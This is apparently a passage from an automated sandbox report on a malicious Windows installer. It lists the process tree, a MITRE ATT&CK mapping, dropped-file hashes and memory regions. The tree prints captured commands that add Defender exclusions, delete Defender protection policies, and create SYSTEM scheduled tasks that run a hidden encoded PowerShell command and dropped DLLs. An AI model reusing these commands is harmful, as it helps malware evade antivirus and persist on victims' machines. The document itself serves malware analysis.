  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LsajhStaXkJRC" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2364
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2928
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QpigBxJgKxUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2088
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:1868
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YNUWFfCEdUiU2" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:1472
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1124
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2256
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1504
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oWxSecJNU" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:1068
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2656
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\eiYaNjTCbhfbMeVB" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2324
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:1196
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:800
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\biwNYXhGTKCQxjLv" /t REG_DWORD /d 0 /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:1348
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gdKDdoLpI" /SC once /ST 02:03:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1760
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gdKDdoLpI"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gdKDdoLpI"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1680
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      4⤵
      PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2276
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:2264
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 04:01:10 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe\" VS /site_id 525403 /S" /V1 /F
    3⤵
    - Drops file in Windows directory
    - Scheduled Task/Job: Scheduled Task
    PID:1152
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "FTlmQXMDCFpnewAuq"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2116
- C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe
  C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe VS /site_id 525403 /S
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1608
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1892
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2372
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    - System Location Discovery: System Language Discovery
    PID:348
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      System Location Discovery: System Language Discovery
      PID:924
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\AOatCp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1004
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1688
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "zeLHdclAQOoTZxj"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2992
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2696
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2344
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\OUuKJjg.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml" /RU "SYSTEM"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:804
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml" /RU "SYSTEM"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 03:03:31 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll\",#1 /site_id 525403" /V1 /F
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2800
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "dBpreMcpfXbehynYz"
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2384
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      4⤵
      System Location Discovery: System Language Discovery
      PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:916
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      4⤵
      PID:2064
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"
    3⤵
    PID:2924
- C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll",#1 /site_id 525403
  2⤵
  PID:2268
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll",#1 /site_id 525403
    3⤵
    - Checks BIOS information in registry
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:2264
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"
      4⤵
      PID:1020

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2436

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2624

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indirect Command Execution

T1202

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\LsajhStaXkJRC\mbnEyUI.xml

Filesize
2KB

MD5
549c2a6aa9d994beb6e82d6a23e48230

SHA1
12b77d549143d1f8feac94a049350253223e4b39

SHA256
c5f0a5be7f5b098e8b3fead9f2c13ed4c633ae38f32e1ea6ee480b818f7d978a

SHA512
1e4a3dd1980afb3fd40a0b683a30b1f371a68b7e4c87260aca940a6519471b1fc5d25eebd3e08e97358246c92a724b3bc2cbdd9fe2a23d24f41e05e9443cb06e

Download Submit
C:\Program Files (x86)\YNUWFfCEdUiU2\ioOgwSz.xml

Filesize
2KB

MD5
6f88a26059770bb93d7a850dfb131f25

SHA1
6cb009ac06b73977c6007f697092dc9d8098b26d

SHA256
4a21cce8b4e5c9613628d6b611d875baa8e65eb3f7e7e1864668ba46362fb45c

SHA512
543962910bc0cebef2baf2b97d97f4bb419f1276a5891e81dbfc4e38022caa641786350cdc2f0b5b4894e929ff11b763df008c1e977e86e008b1363137e6e9a5

Download Submit
C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\caaUEUk.xml

Filesize
2KB

MD5
b23681fb0adfe12001c9dbbe7264be88

SHA1
f247ce4500d13dd079aab50e214493c8bb5af0e9

SHA256
a21c7497075df18b9d66393a0d30fa5dc34d1a2845fd60e694d4f71f28941d73

SHA512
1a9dce109e9d06c07e8c1f203aadafbbbba8ed2410c2daabecabd546720274aff52aa2768d74bd30f76b1fdff2a38c93a095ac26665648aafa31ff94760e8b4e

Download Submit
C:\Program Files (x86)\oWxSecJNU\rzgGdAH.xml

Filesize
2KB

MD5
cc04db55bd3f33f5f3898ba45273c5f7

SHA1
b658dcceb95b17eb52ef759edc55b1c45ec0b976

SHA256
1682df49b35dee26247e7634832dcecbfc8abe1cb3bf4128edc75720e57bc96e

SHA512
c6e0a2de40d87853f9fcbbdfcd6093a275a4ff6fd607455bd789a6f70d9b09106a02a8c05ee6639af71b72e43508acb36d05ea227f28bdddfccfae0a76eb51f5

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
1.1MB

MD5
d70324dba90f00b784bc3b97da5047cd

SHA1
eda42ff5c32976d2c5416419d12f664f6422e0b8

SHA256
432e74ca4319c4b1a1523a5355cf01675859a80aca5e22dfb65e06cc439c3780

SHA512
0f4039287b5b1a70ee469f987a533f1079a8b89c173026fe3086e891bdde55b3c4b76e3ffdee44bebb94bb44af90a79a199c5a2d180a2564139797a0a24c573b

Download Submit
C:\ProgramData\eiYaNjTCbhfbMeVB\OUuKJjg.xml

Filesize
2KB

MD5
9a87d1ddde9efbb7a7375710c7c0fe10

SHA1
d73276c40668b05a847f0796dc212e483eab67c9

SHA256
4c5a26395086f1df256e8b02ec70869cbb37d509860c8e7cb09d59d72855a913

SHA512
ad243bd7ca33a7a9361b394e21851835b4ceb49a75f40be5eb0e1519df9544de6b05dd1bfa7ab544fada280506a36aeef942084741deb1338a856e4c58345d65

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
3a56c67f6dd4ec7f64731f37b9c01a63

SHA1
9d1df43ac137af5563d70b02675311fe6631218a

SHA256
19fb4a64ac821a33c0538e8f50916f5bd3912e3bbb90ea282947673f98873609

SHA512
98583a21f477d9f04f71a39a5e42bf776a5a00990a5ac36e75962a0bc5a72707c533389fd0f984b67271d04671d8da29ff5a70a89c998014cf145458df391920

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
7529a79259636185d4468d1bec57870f

SHA1
4d232d8eff99033ca425727f4b98a0270ed8f380

SHA256
3d4f53362464eff91425a20dbdad317ccf1ae42e9f2537f278d7e97852f3f8c4

SHA512
ea60111c254ea0cd6884ac351f3f511f448abd8b6ad4088012ea8a491cee7d78bce73e4dbfe100cf8da6527e70c3cfd92fc90fc25704fb96eec0afa0866e4c77

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6d0b361337bc68e57b2ff781882abec6

SHA1
fc037af9d5eeb4473cbd332ee9d28afc1d50f0e9

SHA256
044cd8942b58287dd8f7f03bfc12ce1ba22ad639d72194ccd5f48503c1751ccd

SHA512
a0c921f4027f64990a90334f06f1dbc421248f950631ad93ebc06157cfb9a93e48e034648b9c96e1784244d4f41bf1df82743a5ead955bfe898a61ba4fb79100

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a90bf1087aabbe4472fdbca96477dbd7

SHA1
e75f30364d3b14ea4c428825f7bc0ee4307b1a93

SHA256
8cd2644ee7bd8fb7ae2a4f63dcad1331c41cb4cb3d132cf85449636fb33cb1c7

SHA512
90a62f0b9f44b565b99032942340edc2db3ad550ab4e7ec546eb94847d09a01174ad633f200288229b8e64821fd2b470775718554596ebc2f77faa3e09c4c79d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\prefs.js

Filesize
7KB

MD5
85f51981e0996109f07589b78cae351d

SHA1
11a592ac88ed13a5e71fdcbba726951f3b8cc4ab

SHA256
a2c5e7b1fc4f3f30fcd9eaaf80b027c8e5137275a40cc21c0e2dc5f6d06f412c

SHA512
616d8b53a4e86f52569cfec6e88b5fa76f65f475e46c04e0a66bb7bcdaa21cb847f04144b964cc02af21acc75d42e6bf0d7ef038d80ac8ff4c62870bccb03332

Download Submit
C:\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

Filesize
6.2MB

MD5
617698f01c7cceb3b262a98ba4da5a98

SHA1
c9244abc65ab3c485cc197ddea5e846b65d14bad

SHA256
9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754

SHA512
3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

Download Submit
C:\Windows\Temp\biwNYXhGTKCQxjLv\rKQlJSGa\XdkHnHrtbgVLNEcI.wsf

Filesize
8KB

MD5
e6000d40f93cfd9836319346c7b8512f

SHA1
2f9ea5d2ae5c8ea7d0248a3f2cbbe67d3c7d70ad

SHA256
446b88189f9d340d2eefd6750d912d251510f77c24ec46e7f9db5d0d95bb6466

SHA512
f516c957ec0c470367a83892fd911f3b3b6ca520ecbe3f9d37b2db1953ea7d5d150ea0a726703d8a2e7c1224e716a484ff552ce26a71d6c1b3352b99377eda85

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol

Filesize
4KB

MD5
10379cf6c154cf03d8d7e4ff25288e3d

SHA1
eff5c4511e9e22760a332700bd3dc4cf824b07c5

SHA256
85cfddbb1317c3ad1cb93a862763b15be729841081aa8e6bc5a0e2e39325e98c

SHA512
f8c424a0121d564c5def9cbcbbdc9f2582be73e7181964bc40d96c57e0f9adb7316ae65d3baecaae36129266026133c5fc1629182b031b6f6cfefe1d65947b47

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini

Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe

Filesize
6.3MB

MD5
3b76af9e2510171d3739b8bc9ee2ee68

SHA1
4c8148a587ba7e6de8963c2d4dbbcceac39b3694

SHA256
3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768

SHA512
d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

Download Submit
\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe

Filesize
6.8MB

MD5
ad10a30760d467dade24f430b558b465

SHA1
7aaa56e80264c27d080c3b77055294593eacca1b

SHA256
44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a

SHA512
23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

Download Submit
\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

Filesize
5.9MB

MD5
20b1a3686387c8fa9f493835636ff6b1

SHA1
e5c8d1ab0d47938c022ef3500f646e6e71dad796

SHA256
63cc795ef8a4f8abb0e1dc666d18b022d8917935634c7e2e720a9b45a332219c

SHA512
856eb677eafdaacaf0184c87e51a5b037de9c05a49750e6e968f083b169f285b926380bd49dfc35fc7fa777d9a500bbead2732e3472bed7f34542ae8dce7bc7f

Download Submit
\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

Filesize
5.5MB

MD5
602508148063589973dc8c2966b34631

SHA1
45bba65558b9285e0da491f0335e81431145ec25

SHA256
09c46f5c8972d160f2d12e474cc418b8330279c8465dd7315bc3bed7559de7e2

SHA512
0923b0b58c6f91f3d5296d6b4aa692964f591f635f2d2d202eb7464d59794a8d919a3c8c2f683c4e4f292c92eca65ffbd2e204c5fb3ef0a1af6b843cce603058

Download Submit
\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

Filesize
5.3MB

MD5
0dde927f35da834f93206d8dd5b693f5

SHA1
87bd61332b452b28769b26518d5c33f5929f4a7e

SHA256
fd9dfe67e13a909aed94cdb0d412c36e85a0a6b6cbba1a302e9e0981259ba708

SHA512
3ec6facb579cdaf5f5f8b9692f0c22a24b26ecd0e05257d26f177303407309a52cb6e66435a20a7a1294e419c412a2881252bd046fc21e75b9124a75e2e181ab

Download Submit
\Windows\Temp\biwNYXhGTKCQxjLv\EJLpVcSK\vbqcuAn.dll

Filesize
5.6MB

MD5
4903265b4d4031ba26819aea4b49997a

SHA1
226207dcb82dedcde41368a9df406871a826efb6

SHA256
2c81bb199ce76f671dd313f13668f870bef07b6a35cbc2b0f20b35ba2c3d99eb

SHA512
02c393e2f5c88a333c83a6b364906b6743913c70deb12ae6b0820b042b693b91b0ec85ac31a5db061a8564f3b5472c38c202f7a10932feea54fb51e0b22201dd

Download Submit
memory/1468-48-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1468-49-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/1608-290-0x0000000003EE0000-0x0000000003F53000-memory.dmp

Filesize
460KB

Download
memory/1608-305-0x00000000041F0000-0x00000000042AD000-memory.dmp

Filesize
756KB

Download
memory/1608-122-0x00000000036F0000-0x000000000375B000-memory.dmp

Filesize
428KB

Download
memory/1608-87-0x00000000033B0000-0x0000000003435000-memory.dmp

Filesize
532KB

Download
memory/1780-58-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download
memory/1780-59-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

Filesize
32KB

Download
memory/2180-22-0x0000000010000000-0x0000000010F04000-memory.dmp

Filesize
15.0MB

Download
memory/2264-325-0x0000000001430000-0x0000000002334000-memory.dmp

Filesize
15.0MB

Download
memory/2996-30-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2996-31-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download